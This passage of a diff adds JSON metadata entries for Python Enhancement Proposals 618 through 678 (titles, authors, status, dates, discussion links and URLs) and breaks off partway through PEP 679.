618, + "title": "Add Optional Length-Checking To zip", + "authors": "Brandt Bucher", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-May-2020", + "python_version": "3.10", + "post_history": "01-May-2020, 10-May-2020, 16-Jun-2020", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/NLWB7FVJGMBBMCF4P3ZKUIE53JPDOWJ3", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0618/" + }, + "619": { + "number": 619, + "title": "Python 3.10 Release Schedule", + "authors": "Pablo Galindo Salgado", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "release", + "created": "25-May-2020", + "python_version": "3.10", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0619/" + }, + "620": { + "number": 620, + "title": "Hide implementation details from the C API", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "19-Jun-2020", + "python_version": "3.12", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0620/" + }, + "621": { + "number": 621, + "title": "Storing project metadata in pyproject.toml", + "authors": "Brett Cannon, Dustin Ingram, Paul Ganssle, Pradyun Gedam, S\u00e9bastien Eustace, Thomas Kluyver, Tzu-ping Chung", + "discussions_to": "https://discuss.python.org/t/pep-621-round-3/5472", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "22-Jun-2020", + "python_version": null, + "post_history": "22-Jun-2020, 18-Oct-2020, 24-Oct-2020, 31-Oct-2020", + "resolution": "https://discuss.python.org/t/pep-621-round-3/5472/109", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0621/" + }, + "622": { + "number": 622, + "title": "Structural Pattern Matching", + "authors": "Brandt Bucher, Daniel F Moisset, Tobias Kohn, Ivan Levkivskyi, Guido van Rossum, Talin", + "discussions_to": "python-dev@python.org", + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "23-Jun-2020", + "python_version": "3.10", + "post_history": "23-Jun-2020, 08-Jul-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "634", + "url": "https://peps.python.org/pep-0622/" + }, + "623": { + "number": 623, + "title": "Remove wstr from Unicode", + "authors": "Inada Naoki", + "discussions_to": "https://mail.python.org/archives/list/python-dev@python.org/thread/BO2TQHSXWL2RJMINWQQRBF5LANDDJNHH/", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "25-Jun-2020", + "python_version": "3.10", + "post_history": null, + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/VQKDIZLZ6HF2MLTNCUFURK2IFTXVQEYA/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0623/" + }, + "624": { + "number": 624, + "title": "Remove Py_UNICODE encoder APIs", + "authors": "Inada Naoki", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "06-Jul-2020", + "python_version": "3.11", + "post_history": "08-Jul-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0624/" + }, + "625": { + "number": 625, + "title": "Filename of a Source Distribution", + "authors": "Tzu-ping Chung, Paul Moore", + "discussions_to": "https://discuss.python.org/t/draft-pep-file-name-of-a-source-distribution/4686", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "08-Jul-2020", + "python_version": null, + "post_history": "08-Jul-2020", + "resolution": "https://discuss.python.org/t/pep-625-file-name-of-a-source-distribution/4686/159", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0625/" + }, + "626": { + "number": 626, + "title": "Precise line numbers for debugging and other tools.", + "authors": "Mark Shannon", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Jul-2020", + "python_version": "3.10", + "post_history": "17-Jul-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0626/" + }, + "627": { + "number": 627, + "title": "Recording installed projects", + "authors": "Petr Viktorin", + "discussions_to": "https://discuss.python.org/t/pep-627/4126", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "15-Jul-2020", + "python_version": null, + "post_history": null, + "resolution": "https://discuss.python.org/t/pep-627/4126/42", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0627/" + }, + "628": { + "number": 628, + "title": "Add ``math.tau``", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "28-Jun-2011", + "python_version": "3.6", + "post_history": "28-Jun-2011", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0628/" + }, + "629": { + "number": 629, + "title": "Versioning PyPI's Simple API", + "authors": "Donald Stufft", + "discussions_to": "https://discuss.python.org/t/pep-629-versioning-pypis-simple-api/4720", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "16-Jul-2020", + "python_version": null, + "post_history": "16-Jul-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0629/" + }, + "630": { + "number": 630, + "title": "Isolating Extension Modules", + "authors": "Petr Viktorin", + "discussions_to": "capi-sig@python.org", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "25-Aug-2020", + "python_version": null, + "post_history": "16-Jul-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0630/" + }, + "631": { + "number": 631, + "title": "Dependency specification in pyproject.toml based on PEP 508", + "authors": "Ofek Lev", + "discussions_to": "https://discuss.python.org/t/5018", + "status": "Superseded", + "type": "Standards Track", + "topic": "packaging", + "created": "20-Aug-2020", + "python_version": null, + "post_history": "20-Aug-2020", + "resolution": "https://discuss.python.org/t/how-to-specify-dependencies-pep-508-strings-or-a-table-in-toml/5243/38", + "requires": null, + "replaces": null, + "superseded_by": "621", + "url": "https://peps.python.org/pep-0631/" + }, + "632": { + "number": 632, + "title": "Deprecate distutils module", + "authors": "Steve Dower", + "discussions_to": "https://discuss.python.org/t/pep-632-deprecate-distutils-module/5134", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "03-Sep-2020", + "python_version": "3.10", + "post_history": "03-Sep-2020, 22-Jan-2021", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/TXU6TVOMBLQU3SV57DMMOA5Y2E67AW7P/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0632/" + }, + "633": { + "number": 633, + "title": "Dependency specification in pyproject.toml using an exploded TOML table", + "authors": "Laurie Opperman, Arun Babu Neelicattu", + "discussions_to": "https://discuss.python.org/t/dependency-specification-in-pyproject-toml-using-an-exploded-toml-table/5123/", + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "02-Sep-2020", + "python_version": null, + "post_history": "02-Sep-2020", + "resolution": "https://discuss.python.org/t/how-to-specify-dependencies-pep-508-strings-or-a-table-in-toml/5243/38", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0633/" + }, + "634": { + "number": 634, + "title": "Structural Pattern Matching: Specification", + "authors": "Brandt Bucher, Guido van Rossum", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-Sep-2020", + "python_version": "3.10", + "post_history": "22-Oct-2020, 08-Feb-2021", + "resolution": "https://mail.python.org/archives/list/python-committers@python.org/message/SQC2FTLFV5A7DV7RCEAR2I2IKJKGK7W3", + "requires": null, + "replaces": "622", + "superseded_by": null, + "url": "https://peps.python.org/pep-0634/" + }, + "635": { + "number": 635, + "title": "Structural Pattern Matching: Motivation and Rationale", + "authors": "Tobias Kohn, Guido van Rossum", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "12-Sep-2020", + "python_version": "3.10", + "post_history": "22-Oct-2020, 08-Feb-2021", + "resolution": "https://mail.python.org/archives/list/python-committers@python.org/message/SQC2FTLFV5A7DV7RCEAR2I2IKJKGK7W3", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0635/" + }, + "636": { + "number": 636, + "title": "Structural Pattern Matching: Tutorial", + "authors": "Daniel F Moisset", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "12-Sep-2020", + "python_version": "3.10", + "post_history": "22-Oct-2020, 08-Feb-2021", + "resolution": "https://mail.python.org/archives/list/python-committers@python.org/message/SQC2FTLFV5A7DV7RCEAR2I2IKJKGK7W3", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0636/" + }, + "637": { + "number": 637, + "title": "Support for indexing with keyword arguments", + "authors": "Stefano Borini", + "discussions_to": "python-ideas@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "24-Aug-2020", + "python_version": "3.10", + "post_history": "23-Sep-2020", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/6TAQ2BEVSJNV4JM2RJYSSYFJUT3INGZD/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0637/" + }, + "638": { + "number": 638, + "title": "Syntactic Macros", + "authors": "Mark Shannon", + "discussions_to": "https://mail.python.org/archives/list/python-dev@python.org/thread/U4C4XHNRC4SHS3TPZWCTY4SN4QU3TT6V/", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "24-Sep-2020", + "python_version": null, + "post_history": "26-Sep-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0638/" + }, + "639": { + "number": 639, + "title": "Improving License Clarity with Better Package Metadata", + "authors": "Philippe Ombredanne, C.A.M. Gerlach, Karolina Surma", + "discussions_to": "https://discuss.python.org/t/53020", + "status": "Provisional", + "type": "Standards Track", + "topic": "packaging", + "created": "15-Aug-2019", + "python_version": null, + "post_history": "`15-Aug-2019 `__, `17-Dec-2021 `__, `10-May-2024 `__,", + "resolution": "https://discuss.python.org/t/53020/106", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0639/" + }, + "640": { + "number": 640, + "title": "Unused variable syntax", + "authors": "Thomas Wouters", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "04-Oct-2020", + "python_version": "3.10", + "post_history": "19-Oct-2020", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/SQC2FTLFV5A7DV7RCEAR2I2IKJKGK7W3/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0640/" + }, + "641": { + "number": 641, + "title": "Using an underscore in the version portion of Python 3.10 compatibility tags", + "authors": "Brett Cannon, Steve Dower, Barry Warsaw", + "discussions_to": "https://discuss.python.org/t/pep-641-using-an-underscore-in-the-version-portion-of-python-3-10-compatibility-tags/5513", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "20-Oct-2020", + "python_version": "3.10", + "post_history": "21-Oct-2020", + "resolution": "https://discuss.python.org/t/pep-641-using-an-underscore-in-the-version-portion-of-python-3-10-compatibility-tags/5513/42", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0641/" + }, + "642": { + "number": 642, + "title": "Explicit Pattern Syntax for Structural Pattern Matching", + "authors": "Alyssa Coghlan", + "discussions_to": "python-dev@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "26-Sep-2020", + "python_version": "3.10", + "post_history": "31-Oct-2020, 08-Nov-2020, 03-Jan-2021", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/SQC2FTLFV5A7DV7RCEAR2I2IKJKGK7W3/", + "requires": "634", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0642/" + }, + "643": { + "number": 643, + "title": "Metadata for Package Source Distributions", + "authors": "Paul Moore", + "discussions_to": "https://discuss.python.org/t/pep-643-metadata-for-package-source-distributions/5577", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "24-Oct-2020", + "python_version": null, + "post_history": "24-Oct-2020, 01-Nov-2020, 02-Nov-2020, 14-Nov-2020", + "resolution": "https://discuss.python.org/t/pep-643-metadata-for-package-source-distributions/5577/53", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0643/" + }, + "644": { + "number": 644, + "title": "Require OpenSSL 1.1.1 or newer", + "authors": "Christian Heimes", + "discussions_to": "https://discuss.python.org/t/pep-644-require-openssl-1-1-or-newer/5584", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Oct-2020", + "python_version": "3.10", + "post_history": "27-Oct-2020, 03-Mar-2021, 17-Mar-2021, 17-Apr-2021", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/INLCO2EZVQW7R7J2OL6HWVLVU3TQRAZV/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0644/" + }, + "645": { + "number": 645, + "title": "Allow writing optional types as ``x?``", + "authors": "Maggie Moss", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "25-Aug-2020", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/archives/list/typing-sig@python.org/message/E75SPV6DDHLEEFSA5MBN5HUOQWDMUQJ2/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0645/" + }, + "646": { + "number": 646, + "title": "Variadic Generics", + "authors": "Mark Mendoza, Matthew Rahtz, Pradeep Kumar Srinivasan, Vincent Siles", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "16-Sep-2020", + "python_version": "3.11", + "post_history": "07-Oct-2020, 23-Dec-2020, 29-Dec-2020", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/OR5RKV7GAVSGLVH3JAGQ6OXFAXIP5XDX/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0646/" + }, + "647": { + "number": 647, + "title": "User-Defined Type Guards", + "authors": "Eric Traut", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "07-Oct-2020", + "python_version": "3.10", + "post_history": "28-Dec-2020, 09-Apr-2021", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/2ME6F6YUVKHOQYKSHTVQQU5WD4CVAZU4/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0647/" + }, + "648": { + "number": 648, + "title": "Extensible customizations of the interpreter at startup", + "authors": "Mario Corchero", + "discussions_to": "https://discuss.python.org/t/pep-648-extensible-customizations-of-the-interpreter-at-startup/6403", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "30-Dec-2020", + "python_version": "3.11", + "post_history": "16-Dec-2020, 18-Dec-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0648/" + }, + "649": { + "number": 649, + "title": "Deferred Evaluation Of Annotations Using Descriptors", + "authors": "Larry Hastings", + "discussions_to": "https://discuss.python.org/t/pep-649-deferred-evaluation-of-annotations-tentatively-accepted/21331/", + "status": "Accepted", + "type": "Standards Track", + "topic": "typing", + "created": "11-Jan-2021", + "python_version": "3.14", + "post_history": "`11-Jan-2021 `__, `12-Apr-2021 `__, `18-Apr-2021 `__, `09-Aug-2021 `__, `20-Oct-2021 `__, `20-Oct-2021 `__, `17-Nov-2021 `__, `15-Mar-2022 `__, `23-Nov-2022 `__, `07-Feb-2023 `__, `11-Apr-2023 `__,", + "resolution": "`08-May-2023 `__", + "requires": null, + "replaces": "563", + "superseded_by": null, + "url": "https://peps.python.org/pep-0649/" + }, + "650": { + "number": 650, + "title": "Specifying Installer Requirements for Python Projects", + "authors": "Vikram Jayanthi, Dustin Ingram, Brett Cannon", + "discussions_to": "https://discuss.python.org/t/pep-650-specifying-installer-requirements-for-python-projects/6657", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "packaging", + "created": "16-Jul-2020", + "python_version": null, + "post_history": "14-Jan-2021", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0650/" + }, + "651": { + "number": 651, + "title": "Robust Stack Overflow Handling", + "authors": "Mark Shannon", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "18-Jan-2021", + "python_version": null, + "post_history": "19-Jan-2021", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0651/" + }, + "652": { + "number": 652, + "title": "Maintaining the Stable ABI", + "authors": "Petr Viktorin", + "discussions_to": "https://discuss.python.org/t/pre-pep-maintaining-the-stable-abi/6986/", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "09-Feb-2021", + "python_version": "3.10", + "post_history": null, + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/IN4XMFLQJ6D6V67EXU27GV3QWSEHHNNH/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0652/" + }, + "653": { + "number": 653, + "title": "Precise Semantics for Pattern Matching", + "authors": "Mark Shannon", + "discussions_to": null, + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "09-Feb-2021", + "python_version": null, + "post_history": "18-Feb-2021", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0653/" + }, + "654": { + "number": 654, + "title": "Exception Groups and except*", + "authors": "Irit Katriel, Yury Selivanov, Guido van Rossum", + "discussions_to": "https://discuss.python.org/t/accepting-pep-654-exception-groups-and-except/10813", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "22-Feb-2021", + "python_version": "3.11", + "post_history": "`22-Feb-2021 `__, `20-Mar-2021 `__, `03-Oct-2021 `__,", + "resolution": "https://discuss.python.org/t/accepting-pep-654-exception-groups-and-except/10813/1", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0654/" + }, + "655": { + "number": 655, + "title": "Marking individual TypedDict items as required or potentially-missing", + "authors": "David Foster", + "discussions_to": "https://mail.python.org/archives/list/typing-sig@python.org/thread/53XVOD5ZUKJ263MWA6AUPEA6J7LBBLNV/", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "30-Jan-2021", + "python_version": "3.11", + "post_history": "31-Jan-2021, 11-Feb-2021, 20-Feb-2021, 26-Feb-2021, 17-Jan-2022, 28-Jan-2022", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/AJEDNVC3FXM5QXNNW5CR4UCT4KI5XVUE/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0655/" + }, + "656": { + "number": 656, + "title": "Platform Tag for Linux Distributions Using Musl", + "authors": "Tzu-ping Chung", + "discussions_to": "https://discuss.python.org/t/7165", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "17-Mar-2021", + "python_version": null, + "post_history": "17-Mar-2021, 18-Apr-2021", + "resolution": "https://discuss.python.org/t/7165/32", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0656/" + }, + "657": { + "number": 657, + "title": "Include Fine Grained Error Locations in Tracebacks", + "authors": "Pablo Galindo, Batuhan Taskaya, Ammar Askar", + "discussions_to": "https://discuss.python.org/t/pep-657-include-fine-grained-error-locations-in-tracebacks/8629", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "08-May-2021", + "python_version": "3.11", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0657/" + }, + "658": { + "number": 658, + "title": "Serve Distribution Metadata in the Simple Repository API", + "authors": "Tzu-ping Chung", + "discussions_to": "https://discuss.python.org/t/8651", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "10-May-2021", + "python_version": null, + "post_history": "10-May-2021", + "resolution": "https://discuss.python.org/t/8651/48", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0658/" + }, + "659": { + "number": 659, + "title": "Specializing Adaptive Interpreter", + "authors": "Mark Shannon", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "13-Apr-2021", + "python_version": null, + "post_history": "11-May-2021", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0659/" + }, + "660": { + "number": 660, + "title": "Editable installs for pyproject.toml based builds (wheel based)", + "authors": "Daniel Holth, St\u00e9phane Bidoul", + "discussions_to": "https://discuss.python.org/t/draft-pep-editable-installs-for-pep-517-style-build-backends/8510", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "30-Mar-2021", + "python_version": null, + "post_history": null, + "resolution": "https://discuss.python.org/t/pronouncement-on-peps-660-and-662-editable-installs/9450", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0660/" + }, + "661": { + "number": 661, + "title": "Sentinel Values", + "authors": "Tal Einat", + "discussions_to": "https://discuss.python.org/t/pep-661-sentinel-values/9126", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "06-Jun-2021", + "python_version": null, + "post_history": "`20-May-2021 `__, `06-Jun-2021 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0661/" + }, + "662": { + "number": 662, + "title": "Editable installs via virtual wheels", + "authors": "Bern\u00e1t G\u00e1bor", + "discussions_to": "https://discuss.python.org/t/discuss-tbd-editable-installs-by-gaborbernat/9071", + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "28-May-2021", + "python_version": null, + "post_history": null, + "resolution": "https://discuss.python.org/t/pronouncement-on-peps-660-and-662-editable-installs/9450", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0662/" + }, + "663": { + "number": 663, + "title": "Standardizing Enum str(), repr(), and format() behaviors", + "authors": "Ethan Furman", + "discussions_to": "python-dev@python.org", + "status": "Rejected", + "type": "Informational", + "topic": "", + "created": "30-Jun-2021", + "python_version": "3.11", + "post_history": "20-Jul-2021, 02-Nov-2021", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/RN3WCRZSTQR55DOHJTZ2KIO6CZPJPCU7/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0663/" + }, + "664": { + "number": 664, + "title": "Python 3.11 Release Schedule", + "authors": "Pablo Galindo Salgado", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "release", + "created": "12-Jul-2021", + "python_version": "3.11", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0664/" + }, + "665": { + "number": 665, + "title": "A file format to list Python dependencies for reproducibility of an application", + "authors": "Brett Cannon, Pradyun Gedam, Tzu-ping Chung", + "discussions_to": "https://discuss.python.org/t/9911", + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "29-Jul-2021", + "python_version": null, + "post_history": "29-Jul-2021, 03-Nov-2021, 25-Nov-2021", + "resolution": "https://discuss.python.org/t/pep-665-take-2-a-file-format-to-list-python-dependencies-for-reproducibility-of-an-application/11736/140", + "requires": null, + "replaces": null, + "superseded_by": "751", + "url": "https://peps.python.org/pep-0665/" + }, + "666": { + "number": 666, + "title": "Reject Foolish Indentation", + "authors": "Laura Creighton", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "03-Dec-2001", + "python_version": "2.2", + "post_history": "05-Dec-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0666/" + }, + "667": { + "number": 667, + "title": "Consistent views of namespaces", + "authors": "Mark Shannon, Tian Gao", + "discussions_to": "https://discuss.python.org/t/46631", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Jul-2021", + "python_version": "3.13", + "post_history": "20-Aug-2021, 22-Feb-2024", + "resolution": "`25-Apr-2024 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0667/" + }, + "668": { + "number": 668, + "title": "Marking Python base environments as \u201cexternally managed\u201d", + "authors": "Geoffrey Thomas, Matthias Klose, Filipe La\u00edns, Donald Stufft, Tzu-ping Chung, Stefano Rivera, Elana Hashman, Pradyun Gedam", + "discussions_to": "https://discuss.python.org/t/10302", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "18-May-2021", + "python_version": null, + "post_history": "28-May-2021", + "resolution": "https://discuss.python.org/t/10302/44", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0668/" + }, + "669": { + "number": 669, + "title": "Low Impact Monitoring for CPython", + "authors": "Mark Shannon", + "discussions_to": "https://discuss.python.org/t/pep-669-low-impact-monitoring-for-cpython/13018/", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "18-Aug-2021", + "python_version": "3.12", + "post_history": "`07-Dec-2021 `__, `10-Jan-2022 `__,", + "resolution": "https://discuss.python.org/t/pep-669-low-impact-monitoring-for-cpython/13018/42", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0669/" + }, + "670": { + "number": 670, + "title": "Convert macros to functions in the Python C API", + "authors": "Erlend Egeberg Aasland, Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Oct-2021", + "python_version": "3.11", + "post_history": "`20-Oct-2021 `__, `08-Feb-2022 `__, `22-Feb-2022 `__", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/QQFCJ7LR36RUZSC3WI6WZZMQVQ3ZI4MS/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0670/" + }, + "671": { + "number": 671, + "title": "Syntax for late-bound function argument defaults", + "authors": "Chris Angelico", + "discussions_to": "https://mail.python.org/archives/list/python-ideas@python.org/thread/UVOQEK7IRFSCBOH734T5GFJOEJXFCR6A/", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "24-Oct-2021", + "python_version": "3.12", + "post_history": "`24-Oct-2021 `__, `01-Dec-2021 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0671/" + }, + "672": { + "number": 672, + "title": "Unicode-related Security Considerations for Python", + "authors": "Petr Viktorin", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "01-Nov-2021", + "python_version": null, + "post_history": "01-Nov-2021", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0672/" + }, + "673": { + "number": 673, + "title": "Self Type", + "authors": "Pradeep Kumar Srinivasan, James Hilton-Balfe", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "10-Nov-2021", + "python_version": "3.11", + "post_history": "17-Nov-2021", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/J7BWL5KWOPQQK5KFWKENVLXW6UGSPTGI/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0673/" + }, + "674": { + "number": 674, + "title": "Disallow using macros as l-values", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "30-Nov-2021", + "python_version": "3.12", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0674/" + }, + "675": { + "number": 675, + "title": "Arbitrary Literal String Type", + "authors": "Pradeep Kumar Srinivasan, Graham Bleaney", + "discussions_to": "https://mail.python.org/archives/list/typing-sig@python.org/thread/VB74EHNM4RODDFM64NEEEBJQVAUAWIAW/", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "30-Nov-2021", + "python_version": "3.11", + "post_history": "07-Feb-2022", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/XEOOSSPNYPGZ5NXOJFPLXG2BTN7EVRT5/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0675/" + }, + "676": { + "number": 676, + "title": "PEP Infrastructure Process", + "authors": "Adam Turner", + "discussions_to": "https://discuss.python.org/t/10774", + "status": "Active", + "type": "Process", + "topic": "", + "created": "01-Nov-2021", + "python_version": null, + "post_history": "23-Sep-2021, 30-Nov-2021", + "resolution": "https://discuss.python.org/t/10774/99", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0676/" + }, + "677": { + "number": 677, + "title": "Callable Type Syntax", + "authors": "Steven Troxler, Pradeep Kumar Srinivasan", + "discussions_to": "python-dev@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "typing", + "created": "13-Dec-2021", + "python_version": "3.11", + "post_history": "16-Dec-2021", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/NHCLHCU2XCWTBGF732WESMN42YYVKOXB/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0677/" + }, + "678": { + "number": 678, + "title": "Enriching Exceptions with Notes", + "authors": "Zac Hatfield-Dodds", + "discussions_to": "https://discuss.python.org/t/pep-678-enriching-exceptions-with-notes/13374", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-Dec-2021", + "python_version": "3.11", + "post_history": "`27-Jan-2022 `__", + "resolution": "https://discuss.python.org/t/pep-678-enriching-exceptions-with-notes/13374/100", + "requires": "654", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0678/" + }, + "679": { + "number": 679, + "title": "Allow 